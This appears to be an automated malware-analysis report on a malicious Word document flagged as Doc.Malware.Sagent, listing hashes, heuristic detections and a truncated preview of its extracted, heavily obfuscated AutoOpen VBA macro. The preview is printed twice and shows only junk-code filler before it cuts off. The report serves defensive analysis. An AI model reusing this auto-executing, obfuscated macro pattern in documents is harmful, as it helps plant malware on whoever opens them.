Office (OLE) malware analysis — malicious · eb3c1ae6e42074be

MALICIOUS

Office (OLE)

128.5 KB Created: 2018-04-19 18:59:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: f6f3f48117a8924a10af5ed13a240693 SHA-1: dce85ad2df83f0864d2967e19a8fb5ba1d1b8ca0 SHA-256: eb3c1ae6e42074be35741e085c7c28eb6e35cafd6cb6d861030b97fac45bb61f

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Office document containing a VBA macro. The presence of an AutoOpen macro indicates an attempt to automatically execute code when the document is opened. The macro code is heavily obfuscated, preventing a detailed analysis of its specific actions, but the ClamAV detection and heuristic firings confirm its malicious nature. The primary IOC is the file's SHA256 hash.

Heuristics 5

ClamAV: Doc.Malware.Sagent-6697295-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-6697295-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 36501 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	36501 bytes
SHA-256: `2dcde0d98b5b92d2f262a118467c697f9ef27968467f583e07b12f9c98979b1e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Const JuXEauSeiAZejjIBYXAGomFOqai = 0 Sub AutoOpen() On Error Resume Next Dim vIqILyrYdirbuREsapudArYMuMUlUQeFa(4) Dim HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(4) If 11 = 11 + (5 * 0) Then HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(0) = CLng(7918) End If HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(1) = Sqr(5) HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(2) = Month(79187918) HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(3) = Fix(7918.5) If 10 = 10 + (2 * 0) Then Dim BANJyHoGevexewOReaiCiCYKEnEF(4) If 12 = 12 + (10 * 0) Then BANJyHoGevexewOReaiCiCYKEnEF(0) = CLng(1334) End If BANJyHoGevexewOReaiCiCYKEnEF(1) = Sqr(10) BANJyHoGevexewOReaiCiCYKEnEF(2) = Month(13341334) BANJyHoGevexewOReaiCiCYKEnEF(3) = Fix(1334.1) vIqILyrYdirbuREsapudArYMuMUlUQeFa(0) = CLng(9600) Dim suHAfAdaxizbeFYmYpapaPziDUlYgy(4) If 11 = 11 + (8 * 0) Then suHAfAdaxizbeFYmYpapaPziDUlYgy(0) = CLng(7042) End If suHAfAdaxizbeFYmYpapaPziDUlYgy(1) = Sqr(8) suHAfAdaxizbeFYmYpapaPziDUlYgy(2) = Month(70427042) suHAfAdaxizbeFYmYpapaPziDUlYgy(3) = Fix(7042.8) End If vIqILyrYdirbuREsapudArYMuMUlUQeFa(1) = Sqr(2) vIqILyrYdirbuREsapudArYMuMUlUQeFa(2) = Month(96009600) vIqILyrYdirbuREsapudArYMuMUlUQeFa(3) = Fix(9600.2) Dim cOtupAaXArIlAaiFONeWutenIASUPUB(4) If 13 = 13 + (2 * 0) Then cOtupAaXArIlAaiFONeWutenIASUPUB(0) = CLng(9257) End If cOtupAaXArIlAaiFONeWutenIASUPUB(1) = Sqr(2) cOtupAaXArIlAaiFONeWutenIASUPUB(2) = Month(92579257) cOtupAaXArIlAaiFONeWutenIASUPUB(3) = Fix(9257.2) Dim GoTOkikORxOTNeCucubYnAsiqegUfoTiMEqEm(4) Dim TohUROwIfyZiMisErufoxYgbusOJoMalOa(4) If 12 = 12 + (7 * 0) Then TohUROwIfyZiMisErufoxYgbusOJoMalOa(0) = CLng(8421) End If TohUROwIfyZiMisErufoxYgbusOJoMalOa(1) = Sqr(7) TohUROwIfyZiMisErufoxYgbusOJoMalOa(2) = Month(84218421) TohUROwIfyZiMisErufoxYgbusOJoMalOa(3) = Fix(8421.7) If 10 = 10 + (5 * 0) Then Dim nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(4) If 13 = 13 + (6 * 0) Then nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(0) = CLng(6506) End If nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(1) = Sqr(6) nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(2) = Month(65066506) nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(3) = Fix(6506.6) Dim XubYJULeWAQOVoHoFUePTyWOUgAsyTO(4) If 10 = 10 + (9 * 0) Then XubYJULeWAQOVoHoFUePTyWOUgAsyTO(0) = CLng(177) End If XubYJULeWAQOVoHoFUePTyWOUgAsyTO(1) = Sqr(9) XubYJULeWAQOVoHoFUePTyWOUgAsyTO(2) = Month(177177) XubYJULeWAQOVoHoFUePTyWOUgAsyTO(3) = Fix(177.9) GoTOkikORxOTNeCucubYnAsiqegUfoTiMEqEm(0) = CLng(7974) Dim lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(4) If 13 = 13 + (7 * 0) Then lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(0) = CLng(803) End If lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(1) = Sqr(7) lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(2) = Month(803803) lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(3) = Fix(803.7) Dim JOfEriDiAMYloCFEPEfeLMAHLAfU(4) If 13 = 13 + (6 * 0) Then JOfEriDiAMYloCFEPEfeLMAHLAfU(0) = CLng(2804) End If JOfEriDiAMYloCFEPEfeLMAHLAfU(1) = Sqr(6) JOfEriDiAMYloCFEPEfeLMAHLAfU(2) = Month(28042804) JOfEriDiAMYloCFEPEfeLMAHLAfU(3) = Fix(2804.6) End If Dim iEJOjEhamOMojauQysIpYFANilOzUq(4) If 12 = 12 + (8 * 0) Then iEJOjEhamOMojauQysIpYFANilOzUq(0) = CLng(2233) End If iEJOjEhamOMojauQysIpYFANilOzUq(1) = Sqr(8) iEJOjEhamOMojauQysIpYFANilOzUq(2) = Month(22332233) iEJOjEhamOMojauQysIpYFANilOzUq(3) = Fix(2233.8) Dim JexiiivExoPDlEiMcAlOcuKUZygER(4) If 13 = 13 + (10 * 0) Then JexiiivExoPDlEiMcAlOcuKUZygER(0) = CLng(5200) End If JexiiivExoPDlEiMcAlOcuKUZygER(1) = Sqr(10) JexiiivExoPDlEiMcAlOcuKUZygER(2) = Month(52005200) JexiiivExoPDlEiMcAlOcuKUZygER(3) = Fix(5200.1) GoTOkikORxOTNeCucubYnAsiqegUfoTiMEqEm(1) = Sqr(5) Dim iegIcaLuToPyiyTawugAfanOSuJitOtOhiHaVOLYKuvYtE(4) If 10 = 10 + (7 * 0) Then iegIcaLuToPyiyTawugAfanOSuJitOtOhiHaVOLYKuvYtE(0) = CLng(9433) End If iegIcaLuToPyiyTawugAfanOSuJitOtOhiHaVOLYKuvYtE(1 ... (truncated)

SHA-256: 2dcde0d98b5b92d2f262a118467c697f9ef27968467f583e07b12f9c98979b1e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const JuXEauSeiAZejjIBYXAGomFOqai = 0
Sub AutoOpen()
On Error Resume Next
Dim vIqILyrYdirbuREsapudArYMuMUlUQeFa(4)
Dim HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(4)

If 11 = 11 + (5 * 0) Then
HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(0) = CLng(7918)
End If
HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(1) = Sqr(5)
HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(2) = Month(79187918)
HiDEWAKacIvevYzowUJaBYNafIzuqynoGarfoBaruf(3) = Fix(7918.5)

If 10 = 10 + (2 * 0) Then
Dim BANJyHoGevexewOReaiCiCYKEnEF(4)

If 12 = 12 + (10 * 0) Then
BANJyHoGevexewOReaiCiCYKEnEF(0) = CLng(1334)
End If
BANJyHoGevexewOReaiCiCYKEnEF(1) = Sqr(10)
BANJyHoGevexewOReaiCiCYKEnEF(2) = Month(13341334)
BANJyHoGevexewOReaiCiCYKEnEF(3) = Fix(1334.1)
vIqILyrYdirbuREsapudArYMuMUlUQeFa(0) = CLng(9600)
Dim suHAfAdaxizbeFYmYpapaPziDUlYgy(4)

If 11 = 11 + (8 * 0) Then
suHAfAdaxizbeFYmYpapaPziDUlYgy(0) = CLng(7042)
End If
suHAfAdaxizbeFYmYpapaPziDUlYgy(1) = Sqr(8)
suHAfAdaxizbeFYmYpapaPziDUlYgy(2) = Month(70427042)
suHAfAdaxizbeFYmYpapaPziDUlYgy(3) = Fix(7042.8)
End If
vIqILyrYdirbuREsapudArYMuMUlUQeFa(1) = Sqr(2)
vIqILyrYdirbuREsapudArYMuMUlUQeFa(2) = Month(96009600)
vIqILyrYdirbuREsapudArYMuMUlUQeFa(3) = Fix(9600.2)
Dim cOtupAaXArIlAaiFONeWutenIASUPUB(4)

If 13 = 13 + (2 * 0) Then
cOtupAaXArIlAaiFONeWutenIASUPUB(0) = CLng(9257)
End If
cOtupAaXArIlAaiFONeWutenIASUPUB(1) = Sqr(2)
cOtupAaXArIlAaiFONeWutenIASUPUB(2) = Month(92579257)
cOtupAaXArIlAaiFONeWutenIASUPUB(3) = Fix(9257.2)
Dim GoTOkikORxOTNeCucubYnAsiqegUfoTiMEqEm(4)
Dim TohUROwIfyZiMisErufoxYgbusOJoMalOa(4)

If 12 = 12 + (7 * 0) Then
TohUROwIfyZiMisErufoxYgbusOJoMalOa(0) = CLng(8421)
End If
TohUROwIfyZiMisErufoxYgbusOJoMalOa(1) = Sqr(7)
TohUROwIfyZiMisErufoxYgbusOJoMalOa(2) = Month(84218421)
TohUROwIfyZiMisErufoxYgbusOJoMalOa(3) = Fix(8421.7)

If 10 = 10 + (5 * 0) Then
Dim nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(4)

If 13 = 13 + (6 * 0) Then
nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(0) = CLng(6506)
End If
nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(1) = Sqr(6)
nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(2) = Month(65066506)
nYFyQAcmtYqYLIJiNyjNAfuFyjitUze(3) = Fix(6506.6)
Dim XubYJULeWAQOVoHoFUePTyWOUgAsyTO(4)

If 10 = 10 + (9 * 0) Then
XubYJULeWAQOVoHoFUePTyWOUgAsyTO(0) = CLng(177)
End If
XubYJULeWAQOVoHoFUePTyWOUgAsyTO(1) = Sqr(9)
XubYJULeWAQOVoHoFUePTyWOUgAsyTO(2) = Month(177177)
XubYJULeWAQOVoHoFUePTyWOUgAsyTO(3) = Fix(177.9)
GoTOkikORxOTNeCucubYnAsiqegUfoTiMEqEm(0) = CLng(7974)
Dim lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(4)

If 13 = 13 + (7 * 0) Then
lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(0) = CLng(803)
End If
lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(1) = Sqr(7)
lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(2) = Month(803803)
lAlyGyzEWaXOGOqofjEqAzaZUwaCEBYHEs(3) = Fix(803.7)
Dim JOfEriDiAMYloCFEPEfeLMAHLAfU(4)

If 13 = 13 + (6 * 0) Then
JOfEriDiAMYloCFEPEfeLMAHLAfU(0) = CLng(2804)
End If
JOfEriDiAMYloCFEPEfeLMAHLAfU(1) = Sqr(6)
JOfEriDiAMYloCFEPEfeLMAHLAfU(2) = Month(28042804)
JOfEriDiAMYloCFEPEfeLMAHLAfU(3) = Fix(2804.6)
End If
Dim iEJOjEhamOMojauQysIpYFANilOzUq(4)

If 12 = 12 + (8 * 0) Then
iEJOjEhamOMojauQysIpYFANilOzUq(0) = CLng(2233)
End If
iEJOjEhamOMojauQysIpYFANilOzUq(1) = Sqr(8)
iEJOjEhamOMojauQysIpYFANilOzUq(2) = Month(22332233)
iEJOjEhamOMojauQysIpYFANilOzUq(3) = Fix(2233.8)
Dim JexiiivExoPDlEiMcAlOcuKUZygER(4)

If 13 = 13 + (10 * 0) Then
JexiiivExoPDlEiMcAlOcuKUZygER(0) = CLng(5200)
End If
JexiiivExoPDlEiMcAlOcuKUZygER(1) = Sqr(10)
JexiiivExoPDlEiMcAlOcuKUZygER(2) = Month(52005200)
JexiiivExoPDlEiMcAlOcuKUZygER(3) = Fix(5200.1)
GoTOkikORxOTNeCucubYnAsiqegUfoTiMEqEm(1) = Sqr(5)
Dim iegIcaLuToPyiyTawugAfanOSuJitOtOhiHaVOLYKuvYtE(4)

If 10 = 10 + (7 * 0) Then
iegIcaLuToPyiyTawugAfanOSuJitOtOhiHaVOLYKuvYtE(0) = CLng(9433)
End If
iegIcaLuToPyiyTawugAfanOSuJitOtOhiHaVOLYKuvYtE(1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.